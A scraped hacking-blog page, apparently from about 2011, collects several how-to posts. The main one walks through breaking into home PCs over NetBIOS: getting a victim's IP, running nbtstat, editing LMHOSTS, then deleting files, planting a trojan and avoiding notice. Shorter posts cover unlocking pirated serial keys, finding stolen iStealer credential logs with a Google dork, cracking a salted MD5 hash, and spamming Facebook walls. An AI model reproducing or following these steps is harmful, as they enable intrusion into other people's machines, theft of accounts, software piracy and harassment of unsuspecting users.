NOTE that the BIOS is not a software program, insofar as it is not purged from memory when you turn off the computer. It's
firmware, which is basically software on a chip.
A convenient little feature that most BIOS manufacturers include is a startup password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there are numerous software-based BIOS password extractors available from your local H/P/A/V site.
NETBIOS/NBTSTAT - What does it do?

2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is used for identifying a remote network or computer for file sharing enabled. We can expoit systems using this method. It may be old but on home pc's sometimes it still works great. You can use it on your friend at home or something. I don't care what you do, but remember, that you are reading this document because you want to learn. So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there are two ways, but one's faster.
Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT
Method 2:Start>Run>Type Command>Type NBTSTAT
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
Ok! Now since you're in the DOS command under NBTSTAT, you're probably wondering what all that crap is that's on your screen. These are the commands you may use. I'm only going to give you what you need to know since you are striving to be l33t. Your screen should look like the following:

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying
statistics.
C:\WINDOWS\DESKTOP>
The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Host Names

3. Now, the -a means that you will type in the HOST NAME of the person's computer that you are trying to access. Just in case you don't have any idea what a Host Name looks like here's an example.
123-fgh-ppp.internet.com
there are many variations of these adresses. For each different address you see there is a new ISP assigned to that computer. look at the difference.
abc-123.internet.com
ghj-789.newnet.com
these are differnet host names as you can see, and, by identifying the last couple words you will be able to tell that these are two computers on two different ISPs. Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com
IP Addresses
4. You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
201.123.101.123
Most times you can tell if a computer is running on a cable connection because of the IP address's numbers. On faster connections, usually the first two numbers are low. here's a cable connection IP.
24.18.18.10
on dialup connections IP's are higher, like this:
208.148.255.255
notice the 208 is higher than the 24 which is the cable connection.
REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.
Some companies make IP addresses like this to fool the hacker into believing it's a dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This gives you an idea on IP addresses which you will be using on the nbtstat command.
Getting The IP Through DC (Direct Connection)
5. First. You're going to need to find his IP or host name. Either will work. If you are on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname without parenthesis. you will either get a host name or an IP. copy it down. If you do not get it or you are not using mIRC then you must direct connect to their computer or you may use a sniffer to figure out his IP or host name. It's actually better to do it without the sniffer because most sniffers do not work now-a-days. So you want to establish a direct connection to their computer. OK, what is a direct connection? When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the user is not using a proxy server.)
Voice Chatting on Yahoo establishes a direct connection.
If you have none of these programs, either i suggest you get one, get a sniffer, or read this next statement.
If you have any way of sending thema link to your site that enables site traffic statistics, and you can log in, send a link to your site, then check the stats and get the IP of the last visitor. It's a simple and easy method i use. It even fool some smarter hackers, because it catches them off guard. Anyway, once you are directly
connected use either of the two methods i showed you earlier and get into DOS. Type NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It will show you all computers connected to yours. (This is also helpful if you think you are being hacked by a trojan horse and is on a port that you know such as Sub Seven: 27374.) Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first line indicated the Protocol (language) that is being used by the two computers.
TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.
State tells you what kind of connection is being made ESTABLISHED - means it will stay connected to you as long as you are on the program or as long as the computer is allowing or is needing the other computers connection to it. CLOSE_WAIT means the connection closes at times and waits until it is needed or you resume connection to be made again. One that isn't on the list is TIME_WAIT which means it is timed. Most Ads that run on AOL are using TIME_WAIT states.
the way you know the person is directly connected to your computer is because of this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
Notice the host name is included in the fourth line instead of the IP address on all. This is almost ALWAYS, the other computer that is connected to you. So here, now, you have the host name:
abc-123-ppp.webnet.com
If the host name is not listed and the IP is then it NO PROBLEM because either one works exactly the same. I am using abc-123-ppp.webnet.com host name as an example. Ok so now you have the IP and/or host name of the remote system you want to connect to. Time to hack!
Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's the crap again. Well, now time to try out what you have leanred from this document by testing it on the IP and/or host name of the remote system. Here's the only thing you'll need to know.
IMPORTANT, READ NOW!!!
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Remember this?
Time to use it.
-a will be the host name
-A will be the IP
How do i know this?
Read the Statements following the -a -A commands. It tells you there what each command takes.
So have you found which one you have to use?
GOOD!
Time to start.
Using it to your advantage
6. Type this if you have the host name only.
NBTSTAT -a (In here put in hostname without parenthesis)
Type this is you have the IP address only.
NBTSTAT -A (In here put in IP address without parenthesis)
Now, hit enter and wait. Now Either one of two things came up
1. Host not found
2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
---------------------------------------------
If the computer responded "Host not found" Then either one of two things are the case:
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, This system isn't hackable using the NBTSTAT command. So try another system.
If you got the table as above to come up, look at it carefully as i describe to you each part and its purpose.
Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on that share name.
Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?
GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that file sharing is enabled on the share name that is on that line with the hex number. So that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's How to do it. (This is the hard part)
LMHOST File
7. There is a file in all Windows systems called LMHOST.sam. We need to simply add the IP into the LMHOST file because LMHOST basically acts as a network, automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in LMHOST and hit enter. when it comes up open it using a text program such as wordpad, but make sure you do not leave the checkmark to "always open files with this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a

# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
Read this over and over until you understand the way you want your connection to be set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE
Pre will preload the connection as soon as you log on to the net. DOM is the domain or IP address of the host you are connecting to. INCLUDE will automaticall set you to that file path. In this case as soon as I log on to the net I will get access to 255.102.255.102 on the C:/ drive. The only problem with this is that by doin the NETSTAT command while you are connected, and get the IP of your machine. That's why it only works on simple PC machines. Because people in these days are computer illiterate and have no idea of what these commands can do. They have no idea what NETSTAT is, so you can use that to your advantage. Most PC systems are kind of hard to hack using this method now because they are more secure and can tell when another system is trying to gain access. Also, besure that you (somehow) know whether they are running a firewall or not because it will block the connection to their computer. Most home systems aren't running a firewall, and to make it better, they don't know how operate the firewall, therefore, leaving the hole in the system. To help you out some, it would be a great idea to pick up on some programming languages to show you how the computer reads information and learn some things on TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out whether they are running a firewall, simply hop on a Proxy and do a port scan on their IP. You will notice if they are running a firewall because most ports are closed. Either way, you still have a better chance of hacking a home system than hacking Microsoft.
Gaining Access
7. Once you have added this to you LMHOST file. You are basically done. All you need to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system. When it comes up, simply double click it, and boom! There's a GUI for you so you don't have to use DOS anymore. You can use DOS to do it, but it's more simple and fun this way, so that's the only way i put it. When you open the system you can edit, delete, rename, do anything to any file you wish. I would also delete the command file in C:/ because they may use it if they think someone is in their computer. Or simply delete the shortcut to it. Then here's when the programming comes in handy. Instead of using the NBTSTAT method all the time, you can then program you own trojan on your OWN port number and upload it to the system. Then you will have easier access and you will also have a better GUI, with more features. DO NOT allow more than one connection to the system unless they are on a faster connection. If you are downloading something from their computer and they don't know it and their connection is being slow, they may check their NETSTAT to see what is connected, which will show your IP and make them suspicious. Thats it. All there is to it. Now go out and scan a network or something and find a computer with port 21 or something open.
Read More ->>

Saturday, June 11, 2011

Get Serial Key Of Any Software For Free

First off, go to http://www.youserials.com/ and use the search button to search for the program you want.

Then click on the program you want ( i would pick the program with the best % of working)

then it should come up with a survey, don't click the survey!!
Copy this url somewhere, (EXAMPLE:http://www.youserials.com/serial/windows-7-genuine-100/190523)
Copy the last 6 digits of the url, like in this example they are (190523).
The copy the last 6 digits into a notepad or somewhere you can copy and paste back.
Open a new window in your internet browser, copy and past this in there
http://youserials.com/jq_serial.php?id=

at the end of that url post the last 6 digits and it will come up with a key!!
If it doesn't come up then it will be re-directing you to a place where they have put the filE!!!
Read More ->>

Get logs of any premium accounts you want

Hey guys !

I`m gonna show u my next trick to find logs
This time i will learn you how to get logs for a specified website !



Example :
I want a megaupload account !


We know that in many hacking forums , there are shared hundred logs from iStealer , and sure , they can be megaupload premium accounts ! :P



So how we will get them ?

As in my first tutorial , first go to Google.com !

Next , in the search field you must paste the following dork :


Program:     Url/Host:http://www.megaupload.com     Login:        Password:  Computer:     Date:      Ip:
So with this dork , i`m gonna get Megaupload accounts !

If you want for example Rapidshare accounts

change the URL to http://www.rapidshare.com/ !!

And then , after you hit Enter ,
just Enjoy with the results !


The tutorial is written by me | Bibek shah |
For any question , please leave a comment !
Read More ->>

Best way to crack MD5 hashes

In case you did not already know, MD5 is not an encryption, and therefore cannot be decrypted, only cracked.


First off, download "Password Pro" from here.
It is a zip file, so I suggest downloading 7zip.

Extract all of the files to one folder.
It should look similar to this.
[Image: 11987894.png]

For the purpose of this tutorial, I will be cracking this hash: "6dcd0f272fbb7f6f8ff3a8a5e96c45aa:Ws)", which is formatted as "Hash:Salt", and is from VBulletin 4.x.x.

Open up notepad, paste in the Hash and salt, and save it anywhere on your computer, preferably in the same folder as Password Pro.
[Image: 56139940.png]

Open up Password Pro and go to "File->Import"
[Image: 84755402.png]

Find the place where you saved the text file with the hash inside of it, and open it.
Fill in the boxes as such.
[Image: 13377943.png]
Note: The bottom is the formatting of the hash and salt in the text file, and the top is the algorithm for VBulletin 4.x

Now, go to "Audit->Preliminary Attack"
(For this hash, as it is simple, it should probably crack it with just this.)
[Image: 63893726.png]
Hit the start button, and watch it go.
[Image: 70193249.png]


If, in the case that a Preliminary Attack does not work, just repeat the previous steps with a Rainbow Attack (If you have a Rainbow Table), a Simple Dictionary Attack, or a Brute Force Attack.


Post your thoughts, or if this helped you.
Read More ->>

Best Free Facebook Spammer For Free

Hey guys, this will be my first tutorial, mostly aimed at people not willing to shell out money for spammers, so here is how you can spam facebooks for free!

Step 1. Download RSClient

Step 2. Go to Facebook Mobile

Step 3. Open up "RSClient.exe"

Step 4. Select the Auto Clicker.

[Image: f37f009379ed68b63d7fbed69691f49e.png]

Step 4. Enter your message in the Post Bar on the slave's wall.

[Image: fde8335d937708775a56102486d4e321.png]

Step 5. Enter 500 into and put your cursor over post. Hit F1 or F6

[Image: dc263adf08d1a6c241d98851dae95e0e.png]

Step 6. Let it run for 15-20 seconds and you're done! Hit  F2 or F7 to stop it. Thumbsup Check their wall to make sure!

Additional Notes

1. Virus Scan

2. If you get something that says something like "You have been posting too fast, you need to severely slow down or your account may be temporarily banned or terminated" DO NOT WORRY! I have gotten that message 15+ times, when you get it stop!

3. Yes, this tool was originally designed for RS, but seeing as it is not being used for RS, this thread does not violate the Runescape  rule.

4. This is my very first tutorial! Please don't repost it without my permission. Also, please provide criticism for future tutorials.
5. If you Post this thread in any other site than Please give me the credit as it is originally posted by me at First.
Read More ->>